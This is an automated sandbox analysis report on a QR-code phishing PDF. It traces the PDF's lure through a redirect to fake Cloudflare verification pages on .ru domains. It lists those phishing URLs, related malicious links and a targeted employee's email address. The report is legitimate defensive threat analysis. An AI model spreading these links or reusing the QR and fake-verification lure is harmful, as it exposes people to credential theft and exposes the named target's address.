Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52657 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.16:52664 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.159.75:443 -> 192.168.2.16:52665 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.209.161:443 -> 192.168.2.16:52666 version: TLS 1.2
Source: classification engineClassification label: mal52.phis.winPDF@41/67@37/16
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.1360Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-10-04 09-11-12-897.logJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Hollandco-File-871871493.pdf"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2256 --field-trial-handle=1364,i,8592618082487907897,1787593740765580541,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dtnyxe.member365.com/ecommunication/api/click/7Lb0GMXJRUy9jjYQJ2oXiQ/l8Qf-Ol5oF6En4qK8pFq1A?r=https%3A%2F%2FHollandco.athrikasih.com%2Fcloudflare-antibot#dwensel+hollandco.com
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1964,i,1274758649154264039,11806358632527105153,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2256 --field-trial-handle=1364,i,8592618082487907897,1787593740765580541,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1964,i,1274758649154264039,11806358632527105153,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.5.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Hollandco-File-871871493.pdfInitial sample: PDF keyword /JS count = 0
Source: Hollandco-File-871871493.pdfInitial sample: PDF keyword /JavaScript count = 0
Source: Hollandco-File-871871493.pdfInitial sample: PDF keyword /EmbeddedFile count = 0

Persistence and Installation Behavior

barindex
Source: PDF documentLLM: PDF document contains QR code
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information queried: ProcessInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS Memory1
System Information Discovery
Remote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://x1.i.lencr.org/0%URL Reputationsafe
https://code.jquery.com/jquery-3.6.0.min.js0%URL Reputationsafe
https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
9wetjda.niavereinho.ru
188.114.97.3
truefalse
    unknown
    noon.com
    104.17.202.204
    truefalse
      unknown
      bg.microsoft.map.fastly.net
      199.232.214.172
      truefalse
        unknown
        hollandco.athrikasih.com
        103.159.65.146
        truefalse
          unknown
          a.nel.cloudflare.com
          35.190.80.1
          truefalse
            unknown
            code.jquery.com
            151.101.66.137
            truefalse
              unknown
              cdnjs.cloudflare.com
              104.17.25.14
              truefalse
                unknown
                challenges.cloudflare.com
                104.18.95.41
                truefalse
                  unknown
                  m365-prod-eb-aurora-eb-env.2zkz76p2cg.us-west-2.elasticbeanstalk.com
                  44.239.42.53
                  truefalse
                    unknown
                    www.google.com
                    142.250.186.164
                    truefalse
                      unknown
                      wgqe7vkgoahs84cyd22bjy2ejwoyyvjyphrjtoyny5kmdunzf1munrjcw1b.transenil.ru
                      188.114.97.3
                      truefalse
                        unknown
                        x1.i.lencr.org
                        unknown
                        unknownfalse
                          unknown
                          dtnyxe.member365.com
                          unknown
                          unknowntrue
                            unknown
                            www.noon.com
                            unknown
                            unknownfalse
                              unknown
                              NameMaliciousAntivirus DetectionReputation
                              https://noon.com/false
                                unknown
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8cd56adf1e4c7ce7/1728047484359/cSCIqWMfG6sfcGKfalse
                                  unknown
                                  https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.jsfalse
                                    unknown
                                    https://hollandco.athrikasih.com/cloudflare-antibot/false
                                      unknown
                                      https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/x2cq0/0x4AAAAAAAhkfK1nz8jjG-wE/auto/fbE/normal/auto/false
                                        unknown
                                        https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                                          unknown
                                          https://9wetjda.niavereinho.ru/QTnArt4/false
                                            unknown
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/786006458:1728044719:U-h0t91PTgLDBIoHLkW1c4DQoh4-3OGX1NMhUHSThFI/8cd56adf1e4c7ce7/c6eaeb7329255ddfalse
                                              unknown
                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cd56b4bca50423a&lang=autofalse
                                                unknown
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/jxw27/0x4AAAAAAAicAxRArJzeiy3v/auto/fbE/normal/auto/false
                                                  unknown
                                                  https://a.nel.cloudflare.com/report/v4?s=v8w%2Bvwhx1y4kU1skquzdEMq2sWfTrENkggTrFExr4oHFIp94bo7K1Fl9qSv2s93b4wEwr7AKizzf%2Bf7I8UKOO4IaN1DpaaRW9mxCk2rnDAtZ3fFQb01x2H%2FDRaFXMg%3D%3Dfalse
                                                    unknown
                                                    https://hollandco.athrikasih.com/cloudflare-antibot/#dwensel+hollandco.comfalse
                                                      unknown
                                                      https://hollandco.athrikasih.com/cloudflare-antibotfalse
                                                        unknown
                                                        https://hollandco.athrikasih.com/favicon.icofalse
                                                          unknown
                                                          https://hollandco.athrikasih.com/cdn-cgi/challenge-platform/h/g/rc/8cd56adf1e4c7ce7false
                                                            unknown
                                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8cd56b4bca50423a/1728047501852/f96dfdf1476db5c1c12c75ca405306e993064662438dbaa062225451bc879712/HnD5w_lm3dPB86Mfalse
                                                              unknown
                                                              https://dtnyxe.member365.com/ecommunication/api/click/7Lb0GMXJRUy9jjYQJ2oXiQ/l8Qf-Ol5oF6En4qK8pFq1A?r=https%3A%2F%2FHollandco.athrikasih.com%2Fcloudflare-antibottrue
                                                                unknown
                                                                https://9wetjda.niavereinho.ru/favicon.icofalse
                                                                  unknown
                                                                  https://9wetjda.niavereinho.ru/QTnArt4/#Ddwensel@hollandco.comtrue
                                                                    unknown
                                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3Dfalse
                                                                      unknown
                                                                      https://wgqe7vkgoahs84cyd22bjy2ejwoyyvjyphrjtoyny5kmdunzf1munrjcw1b.transenil.ru/rreozoythcvyficrHTcllUWRLKOTPFRJKMWZZBRXQBHXTDTWYQNfalse
                                                                        unknown
                                                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cd56adf1e4c7ce7&lang=autofalse
                                                                          unknown
                                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/868862447:1728044727:Gz7Dl8mZdZr0DP9Q4Zh7hrsdOMaLwCsED9HAlqQ_3D4/8cd56b4bca50423a/c1fc4ecc24bba50false
                                                                            unknown
                                                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8cd56b4bca50423a/1728047501850/dKqrmOItVOoeN4wfalse
                                                                              unknown
                                                                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8cd56adf1e4c7ce7/1728047484358/48e1015a2d24b58034bfdd5402f79a57ea9323b37e0924aa7d29e54bfe487ea4/RoID7XXaQ-k-wPEfalse
                                                                                unknown
                                                                                NameSourceMaliciousAntivirus DetectionReputation
                                                                                https://chrome.cloudflare-dns.com012c37a5-07fe-4ba7-ac20-d719fa6787f4.tmp.3.dr, 14d17f72-c870-46b3-86cf-ca499a568070.tmp.3.drfalse
                                                                                  unknown
                                                                                  http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.2.drfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://9wETjDA.niavereinho.ru/QTnArt4/#Dchromecache_227.6.drfalse
                                                                                    unknown
                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs
                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    104.18.94.41
                                                                                    unknownUnited States
                                                                                    13335CLOUDFLARENETUSfalse
                                                                                    151.101.130.137
                                                                                    unknownUnited States
                                                                                    54113FASTLYUSfalse
                                                                                    103.159.65.146
                                                                                    hollandco.athrikasih.comunknown
                                                                                    134687TWIDC-AS-APTWIDCLimitedHKfalse
                                                                                    151.101.66.137
                                                                                    code.jquery.comUnited States
                                                                                    54113FASTLYUSfalse
                                                                                    35.190.80.1
                                                                                    a.nel.cloudflare.comUnited States
                                                                                    15169GOOGLEUSfalse
                                                                                    104.17.24.14
                                                                                    unknownUnited States
                                                                                    13335CLOUDFLARENETUSfalse
                                                                                    44.239.42.53
                                                                                    m365-prod-eb-aurora-eb-env.2zkz76p2cg.us-west-2.elasticbeanstalk.comUnited States
                                                                                    16509AMAZON-02USfalse
                                                                                    104.18.95.41
                                                                                    challenges.cloudflare.comUnited States
                                                                                    13335CLOUDFLARENETUSfalse
                                                                                    104.17.202.204
                                                                                    noon.comUnited States
                                                                                    13335CLOUDFLARENETUSfalse
                                                                                    104.78.188.188
                                                                                    unknownUnited States
                                                                                    16625AKAMAI-ASUSfalse
                                                                                    239.255.255.250
                                                                                    unknownReserved
                                                                                    unknownunknownfalse
                                                                                    188.114.97.3
                                                                                    9wetjda.niavereinho.ruEuropean Union
                                                                                    13335CLOUDFLARENETUSfalse
                                                                                    188.114.96.3
                                                                                    unknownEuropean Union
                                                                                    13335CLOUDFLARENETUSfalse
                                                                                    142.250.186.164
                                                                                    www.google.comUnited States
                                                                                    15169GOOGLEUSfalse
                                                                                    104.17.25.14
                                                                                    cdnjs.cloudflare.comUnited States
                                                                                    13335CLOUDFLARENETUSfalse
                                                                                    IP
                                                                                    192.168.2.16
                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1525816
                                                                                    Start date and time:2024-10-04 15:09:47 +02:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 4m 44s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:15
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:Hollandco-File-871871493.pdf
                                                                                    Detection:MAL
                                                                                    Classification:mal52.phis.winPDF@41/67@37/16
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .pdf
                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 184.28.88.176, 142.250.185.99, 142.250.186.78, 142.251.173.84, 23.22.254.206, 52.202.204.11, 52.5.13.197, 54.227.187.23, 34.104.35.123, 172.64.41.3, 162.159.61.3, 2.23.197.184, 93.184.221.240, 2.19.126.149, 2.19.126.143, 2.19.224.93, 142.250.181.227
                                                                                    • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, clientservices.googleapis.com, wildcard.noon.com.edgekey.net, wu.azureedge.net, acroipm2.adobe.com, clients2.google.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, www.bing.com, e14539.a.akamaiedge.net, accounts.google.com, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com, geo2.adobe.com
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    • VT rate limit hit for: Hollandco-File-871871493.pdf
                                                                                    TimeTypeDescription
                                                                                    09:11:23API Interceptor2x Sleep call for process: AcroCEF.exe modified
                                                                                    SourceURL
                                                                                    Screenshothttps://dtnyxe.member365.com/ecommunication/api/click/7Lb0GMXJRUy9jjYQJ2oXiQ/l8Qf-Ol5oF6En4qK8pFq1A?r=https%3A%2F%2FHollandco.athrikasih.com%2Fcloudflare-antibot#dwensel+hollandco.com
                                                                                    InputOutput
                                                                                    URL: https://hollandco.athrikasih.com/cloudflare-antibot/#dwensel+hollandco.com Model: jbxai
                                                                                    {
                                                                                    "brand":[],
                                                                                    "contains_trigger_text":false,
                                                                                    "trigger_text":"",
                                                                                    "prominent_button_name":"unknown",
                                                                                    "text_input_field_labels":"unknown",
                                                                                    "pdf_icon_visible":false,
                                                                                    "has_visible_captcha":false,
                                                                                    "has_urgent_text":false,
                                                                                    "has_visible_qrcode":false}
                                                                                    URL: https://hollandco.athrikasih.com/cloudflare-antibot/#dwensel+hollandco.com Model: jbxai
                                                                                    {
                                                                                    "brand":["CLOUDFLARE"],
                                                                                    "contains_trigger_text":true,
                                                                                    "trigger_text":"Verifying...",
                                                                                    "prominent_button_name":"unknown",
                                                                                    "text_input_field_labels":"unknown",
                                                                                    "pdf_icon_visible":false,
                                                                                    "has_visible_captcha":false,
                                                                                    "has_urgent_text":false,
                                                                                    "has_visible_qrcode":false}
                                                                                    URL: PDF document Model: jbxai
                                                                                    {
                                                                                    "brand":["Hollandco"],
                                                                                    "contains_trigger_text":true,
                                                                                    "trigger_text":"Scan the QR code below with your smartphone camera for easy access to the document review.",
                                                                                    "prominent_button_name":"unknown",
                                                                                    "text_input_field_labels":"unknown",
                                                                                    "pdf_icon_visible":false,
                                                                                    "has_visible_captcha":false,
                                                                                    "has_urgent_text":false,
                                                                                    "has_visible_qrcode":true}
                                                                                    URL: https://hollandco.athrikasih.com/cloudflare-antibot/#dwensel+hollandco.com Model: jbxai
                                                                                    {
                                                                                    "brand":["CLOUDFLARE"],
                                                                                    "contains_trigger_text":false,
                                                                                    "trigger_text":"",
                                                                                    "prominent_button_name":"unknown",
                                                                                    "text_input_field_labels":"unknown",
                                                                                    "pdf_icon_visible":false,
                                                                                    "has_visible_captcha":false,
                                                                                    "has_urgent_text":false,
                                                                                    "has_visible_qrcode":false}
                                                                                    URL: https://9wetjda.niavereinho.ru/QTnArt4/#Ddwensel@hollandco.com Model: jbxai
                                                                                    {
                                                                                    "brand":["CLOUDFLARE"],
                                                                                    "contains_trigger_text":true,
                                                                                    "trigger_text":"Ensuring your safety with browser verification.",
                                                                                    "prominent_button_name":"unknown",
                                                                                    "text_input_field_labels":"unknown",
                                                                                    "pdf_icon_visible":false,
                                                                                    "has_visible_captcha":false,
                                                                                    "has_urgent_text":false,
                                                                                    "has_visible_qrcode":false}
                                                                                    URL: https://9wetjda.niavereinho.ru/QTnArt4/#Ddwensel@hollandco.com Model: jbxai
                                                                                    {
                                                                                    "brand":["CLOUDFLARE"],
                                                                                    "contains_trigger_text":true,
                                                                                    "trigger_text":"Ensuring your safety with browser verification.",
                                                                                    "prominent_button_name":"unknown",
                                                                                    "text_input_field_labels":"unknown",
                                                                                    "pdf_icon_visible":false,
                                                                                    "has_visible_captcha":false,
                                                                                    "has_urgent_text":false,
                                                                                    "has_visible_qrcode":false}
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    104.18.94.41https://www.google.com/url?sa=t&url=https%3A%2F%2F%6d%6f%73%63%76%61%64%75%6d%61%2e%70%72%6f%2F&usg=AOvVaw0d8WU-1rxjmcdGQTa3JxQL&opi=Get hashmaliciousHTMLPhisherBrowse
                                                                                      https://app.collabow.io/d/GNgkdZO5gKluqEP3mMdbEwzWbgEyOeRe8sIh64SLMvsNGet hashmaliciousUnknownBrowse
                                                                                        https://kakeza.com/aW5mb0BkZXNpZ25lcm91dGxldG5ldW11ZW5zdGVyLmRl&NrPFWwrrioJP&hmr&x-af-vt&02810264Get hashmaliciousHTMLPhisherBrowse
                                                                                          https://docsignfile.z13.web.core.windows.net/&redirect_mongo_id=66fea70f62194c155d978939&utm_source=Springbot&utm_medium=Email&utm_campaign=66fea70f62194c155d97893aGet hashmaliciousHTMLPhisherBrowse
                                                                                            https://docsignfile.z13.web.core.windows.net/&redirect_mongo_id=66fea70f62194c155d978939&utm_source=Springbot&utm_medium=Email&utm_campaign=66fea70f62194c155d97893aGet hashmaliciousUnknownBrowse
